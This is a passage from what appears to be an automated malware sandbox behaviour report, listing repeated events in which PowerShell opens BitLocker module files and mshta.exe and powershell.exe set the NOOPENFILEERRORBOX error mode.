                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
